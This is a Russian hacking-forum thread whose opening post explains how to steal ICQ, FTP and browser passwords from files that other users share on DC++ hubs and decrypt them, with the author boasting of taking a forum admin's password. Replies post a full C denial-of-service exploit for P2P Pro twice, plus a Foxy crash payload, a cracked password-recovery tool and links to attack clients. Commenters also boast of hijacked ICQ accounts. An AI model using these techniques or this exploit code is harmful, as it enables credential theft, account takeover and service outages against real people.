Форум АНТИЧАТ - Инструмент: Dc++

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)

- - Инструмент: Dc++ (https://forum.antichat.xyz/showthread.php?t=71607)

Инструмент: Dc++

Мини мануал о том, что можно вытворять на хабе.
Все, ниже изложенное было придумано и написано мной, мб эта тема уже поднималась.
1. Угон icq.
Всем известно, что пассы от кипа содержаться в файле config.ini. Очень много юзверей, расшаривающих свои program files в которых зачастую находится дира qip. Далее все просто, идем поиск, вписываем config.ini, ищем. Перед тем как сливать все найденные конфиги, обязательно смотрите путь до этого файла, дабы не слить шлак. (Примерный путь до конфига: QIP/user/nomerICQ/config.ini)
После того, как мы слили конфиг расшифровываем его прогой МПР . (Жмем «мастер», выбираем нужный модуль, ставим путь до скачанного конфига, смотрим пасс=)
Аналогичным образом можно тырить пассы от R&Q, файл конфига - andrq.ini
В случае с клиентами Mirana, Icq 5, Odigo, Pidgin нужно тянуть всю папку.
2. Угон фтп.
Все аналогично. Клиенты/файлы с конфигами.
BulletProof FTP Client - bpftp.dat
FileZilla - FileZilla.xml
FTP Commander - ftplist.txt
Total Commander - wcx_ftp.ini
Ищем конфиги, сливаем, расшифровываем.
3. Сохраненные в браузерах данные. (Protected Storage).
Opera - wand.dat
Mozilla Firefox - *.s *.txt (лучше тянуть всю папку)
Internet Explorer – неебу (также тянем всю папку)
Далее аналогично, сливаем, расшифровываем той же МПР.
Есть задумка, тырить серты от Вм для входа в кипер лайт.. Но пока я не пробовал реализовать эту идею.
4. Не палим содержимое винта.
Часто бывает так, что для нормальной загрузки файлов с дц++ нужно расшарить нное кол-во гб, режим "за стеклом" лишь запрещает закачку другим юзерам ваших расшаренных файлов, но не просмотр названий и путей содержимого. А нам палить содержимое винта не нужно. Можно открыть любой файл хекс редактором и напихать в ручную в конец всякого говна.. Но 10гб говна это жестоко=) Для этого можно заюзать прогу Rubbish 1.0 , она добавялет указанное количество мусора в конец файла.

Примечание.
Всегда внимательно смотрите ники юзеров у кого сливаете конфиги, ибо нередко слабоумные админы/модеры известных или "нужных" проектов расшаривают свою конфиденциальную инфу. (у меня получалось слить конфиг от оперы одмина нашего локального форума, где у него лежал пасс от админки. Хотя до этого, его форум йа пытался похекать несколько дней)
После прочтения статьи внимательно просмотрите ваши расшаренные файлы).
Удачи всем!
(c) WedRRRySS
Интересное по теме:
Флудер ДЦ++ http://forum.antichat.ru/thread36241.html
Выбивание юзверей из сети http://forum.xakep.ru/m_770333/tm.htm

Цитата:

Internet Explorer – неебу (также тянем всю папку)

Нах, IE хранит пароли в Protected Storage

А так идея баян и статью эту уже кто-то писал

Цитата:

Сообщение от SMAC

Нах, IE хранит пароли в Protected Storage

А так идея баян и статью эту уже кто-то писал

Йа лично дошел до способа сам..

И это статья???????!!!
М-Да удивил!

в сети народу мало, подскажите какой-нибудь крупный инет хаб

имхо, во многих случаях придется тянуть реестр(!)...xD

Цитата:

Сообщение от k0lbasa

в сети народу мало, подскажите какой-нибудь крупный инет хаб

->http://dchublist.ru/

TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...

Exploit EVILGMP, отрубает серв))

PHP код:


		
			
/* 

   P2P Pro Command DOS Exploit 

------------------------------------ 

Infam0us Gr0up - Securiti Research 



Info: infamous.2hell.com 

Vendor URL: http://www.digital-revolution.org/P2PPro.html 



*/ 



#include <string.h> 

#include <winsock2.h> 

#include <stdio.h> 



#pragma comment(lib, "ws2_32.lib") 



char doscore[] = 

"\x3f\x3f\xbc\x59\x70 " 

"\x32\x70\x3f\xe1 " 

"\x2b\x5c\x3f\xa6\xeb\xa6" 

"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6" 

"\x50\x4f\x57\x4e\x45\x44\x2e\x74" 

"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6" 

"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62"; 



int main(int argc, char *argv[]) 

{ 

WSADATA wsaData; 

WORD wVersionRequested; 

struct hostent *pTarget; 

struct sockaddr_in sock; 

char *target; 

int port,bufsize; 

SOCKET inetdos; 



if (argc < 2) 

{ 

printf(" P2P Pro Command DOS Exploit \n", argv[0]); 

printf(" --------------------------------------\n", argv[0]); 

printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]); 

printf("[-]Usage: %s [target] [port]\n", argv[0]); 

printf("[?]Exam: %s localhost 7802\n", argv[0]); 

exit(1); 

} 



wVersionRequested = MAKEWORD(1, 1); 

if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; 



target = argv[1]; 

port = 7802; 



if (argc >= 3) port = atoi(argv[2]); 

bufsize = 1024; 

if (argc >= 4) bufsize = atoi(argv[3]); 



inetdos = socket(AF_INET, SOCK_STREAM, 0); 

if(inetdos==INVALID_SOCKET) 

{ 

printf("Socket ERROR \n"); 

exit(1); 

} 

printf(" P2P Pro Command DOS Exploit \n", argv[0]); 

printf(" --------------------------------------\r\n\n", argv[0]); 

printf("Resolve host... "); 

if ((pTarget = gethostbyname(target)) == NULL) 

{ 

printf("FAILED \n", argv[0]); 

exit(1); 

} 

printf("[OK]\n "); 

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); 

sock.sin_family = AF_INET; 

sock.sin_port = htons((USHORT)port); 



printf("[+] Connecting... "); 

if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) 

{ 

printf("FAILED\n"); 

exit(1); 

} 

printf("[OK]\n"); 

printf("Target listen.. \n"); 

printf("Sending bad procedure... "); 

if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) 

{ 

printf("ERROR\n"); 

closesocket(inetdos); 

exit(1); 

} 

printf("[OK]\n "); 

printf("[+] Server SHUTDOWNED!\n"); 

closesocket(inetdos); 

WSACleanup(); 

return 0; 

}

Цитата:

Сообщение от -=lebed=-

TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...

Попробую поискать..

статья шлак имхо....
расшаривают папку програм файлс наверно токо блондинки и домохозяйки, которые врядли знают как это сдалать и зачем.
и файл со шлаком на 10гиг это вообще бред...

2 Solide Snake: tnx за сплоит)

1) Уже было, давно сам поднимал http://forum.antichat.ru/thread49288.html
2) Почему только DC++?
3) маловато для статьи.

Но все равно удачи в начинаниях=)

Цитата:

расшаривают папку програм файлс наверно токо блондинки и домохозяйки, которые врядли знают как это сдалать и зачем.

У меня она тоже расшарена)))Только кроме папок QIP и WebMoney))

Молодец,что постарался написать,но увы таких статей выходит ой как часто...

Цитата:

4. Не палим содержимое винта.
Часто бывает так, что для нормальной загрузки файлов с дц++ нужно расшарить нное кол-во гб, режим "за стеклом" лишь запрещает закачку другим юзерам ваших расшаренных файлов, но не просмотр названий и путей содержимого. А нам палить содержимое винта не нужно. Можно открыть любой файл хекс редактором и напихать в ручную в конец всякого говна.. Но 10гб говна это жестоко=) Для этого можно заюзать прогу Rubbish 1.0 , она добавялет указанное количество мусора в конец файла

Вот это меян безумно насмешило...хотя для совсем новичков пойдет :)
ЗЫ:Не обижайся....я плюсиге поставил =)

ну почему же, норм статья, для начинающих сойдет, так щас пароль чей-то узнал, зашел в аську, потрепался))

Цитата:

Сообщение от Solide Snake

У меня она тоже расшарена)))Только кроме папок QIP и WebMoney))

ну ладно, наверно это утверждение не актуально...
если умно расшарить, может быть полезно разве что людям которым больше нечего шарить... + на большинстве хабов на которых я был, шарить системные папки (windos, program files, tmp, document and settigns etc.) запрещено правилами....

Tc, статья куль) продолжай в том же духе.;)

Давным давно снимал видео по угону аськи через DС++
вот кому интересно смотрите :)

Ifolder
WebFile
pass:antichat.ru

у меня в сетке этих папок расшареных куева туча оказалась))) мыло кипы и до хрена всего))

лови +

baltazar, как пользоватся, напиши плиз.

Цитата:

выложи лекарство к МПР. не могу найти.

http://rapidshare.com/files/120015611/MultiPasswordRecovery.exe
вылеченная версия уже

Народ а какой файл тянуть для паролей от Ie ?

ни знаю как это статьей назвать
но за старания плюзз

Цитата:

Сообщение от baltazar

вот ддосер

Код:

Exploit:

/*

   P2P Pro Command DOS Exploit

------------------------------------

Infam0us Gr0up - Securiti Research



Info: infamous.2hell.com

Vendor URL: http://www.digital-revolution.org/P2PPro.html



*/



#include <string.h>

#include <winsock2.h>

#include <stdio.h>



#pragma comment(lib, "ws2_32.lib")



char doscore[] =

"\x3f\x3f\xbc\x59\x70 "

"\x32\x70\x3f\xe1 "

"\x2b\x5c\x3f\xa6\xeb\xa6"

"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6"

"\x50\x4f\x57\x4e\x45\x44\x2e\x74"

"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6"

"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62";



int main(int argc, char *argv[])

{

WSADATA wsaData;

WORD wVersionRequested;

struct hostent *pTarget;

struct sockaddr_in sock;

char *target;

int port,bufsize;

SOCKET inetdos;



if (argc < 2)

{

printf(" P2P Pro Command DOS Exploit \n", argv[0]);

printf(" --------------------------------------\n", argv[0]);

printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]);

printf("[-]Usage: %s [target] [port]\n", argv[0]);

printf("[?]Exam: %s localhost 7802\n", argv[0]);

exit(1);

}



wVersionRequested = MAKEWORD(1, 1);

if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;



target = argv[1];

port = 7802;



if (argc >= 3) port = atoi(argv[2]);

bufsize = 1024;

if (argc >= 4) bufsize = atoi(argv[3]);



inetdos = socket(AF_INET, SOCK_STREAM, 0);

if(inetdos==INVALID_SOCKET)

{

printf("Socket ERROR \n");

exit(1);

}

printf(" P2P Pro Command DOS Exploit \n", argv[0]);

printf(" --------------------------------------\r\n\n", argv[0]);

printf("Resolve host... ");

if ((pTarget = gethostbyname(target)) == NULL)

{

printf("FAILED \n", argv[0]);

exit(1);

}

printf("[OK]\n ");

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

sock.sin_family = AF_INET;

sock.sin_port = htons((USHORT)port);



printf("[+] Connecting... ");

if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))

{

printf("FAILED\n");

exit(1);

}

printf("[OK]\n");

printf("Target listen.. \n");

printf("Sending bad procedure... ");

if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)

{

printf("ERROR\n");

closesocket(inetdos);

exit(1);

}

printf("[OK]\n ");

printf("[+] Server SHUTDOWNED!\n");

closesocket(inetdos);

WSACleanup();

return 0;

}

Как это юзать? Пожалуйста расскажите...

То,что способ этот автор нашел сам оооооооооочень сильно сомневаюсь,могу скинуть ссылку на статью,написанную об том же самом способе в конце января.(статья на чит-форум под хайдом)

все конечно интересно, но рекомендую не изголяться так а использовать клиенты вроде greylink.
Среди возможностей: подделка шары (если администрации хаба не совершенно на все пофик, лучше не использовать), подделка слотов (вот это пропалить почти невозможно), скрытие ограничений исходящего потока, встроен довольно актуальный сплоит на отказ в обслуживании некоторых клиентов (PFS атака), и куча других приятных вещей.
последняя версия http://www.chinesefreewebs.com/greylink/bin/greylink0002.rar тут

P2P Foxy Out of memory Exploit

Код:

# Vulnerability Discovered by Styxosaurus

# Styxosaurus [at] gmail [dot] com

#

# Foxy is one of the most popular P2P software in Chinese users

# http://tw.gofoxy.net/

#

# It starts to request more memory and freeze 

# as when "&fs=" meet some large magic point.





<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4

&dn=music.wmv&fs=1000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000

0000000000000000000000000'>Music.wmv</a>

http://www.milw0rm.com/exploits/5843

PandoraBox, имхо немного не в тему, тут вроде Direct Connect, который не совсем foxy =\

Никогда не задумывался о краже в дс++, сейчас оьбладаю 3 шохами =)

(ShadoW), код написанный на си, в вижуал студио и компиль.....

Цитата:

Сообщение от Sn@k3

Никогда не задумывался о краже в дс++, сейчас оьбладаю 3 шохами =)

ого,на каком хабе взял?Я в феврале пытался,в лучшем случае девятки попадались,и одна семерка(а сидел я не на одном хабе и не один час).